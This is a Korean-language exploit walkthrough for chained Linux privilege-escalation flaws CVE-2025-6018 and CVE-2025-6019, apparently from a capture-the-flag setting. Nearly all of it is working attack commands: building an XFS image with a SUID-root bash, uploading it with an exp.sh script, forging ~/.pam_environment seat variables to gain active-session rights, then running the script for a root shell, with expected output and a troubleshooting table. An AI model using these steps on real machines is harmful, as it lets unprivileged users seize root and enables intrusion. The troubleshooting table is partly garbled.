
CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit
# 300MB XFS 이미지 생성
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# 마운트 및 SUID bash 설치
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# 확인 (300M가 표시되어야 함)
ls -lh xfs.image
# 익스플로잇 스크립트 및 이미지 업로드
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/
# SSH 로그인
ssh [email protected]
# PAM 환경 변수 작성
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# 구성 확인
cat ~/.pam_environment
# 🔥 중요: 로그아웃 (PAM 설정 활성화를 위해)
exit
# SSH 재로그인 (PAM 설정이 활성화됨)
ssh [email protected]
# PAM 활성화 확인 (('yes',) 반환되어야 함)
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# 권한 상승 스크립트 실행
bash exp.sh
익스플로잇이 성공하면 다음이 표시됩니다:
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ 루트 플래그 ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
| 문제 | 해결 방법 |
|---|---|
CanReboot가 ('no',) 반환 | 로그아웃 후 다시 로그인했는지 확인 (3단계) |
| 오류 |
('yes',) 반환을 확인하세요.ssh -t user@host "cmd" 스타일 실행을 사용하지 마세요.실패하면 모든 단계를 엄격한 순서로 실행했는지 확인하세요!
Not authorized~/.pam_environment 내용이 올바른지 확인 |
| SUID bash를 찾을 수 없음 | xfs.image를 다시 업로드하고 SUID 비트가 설정되었는지 확인 |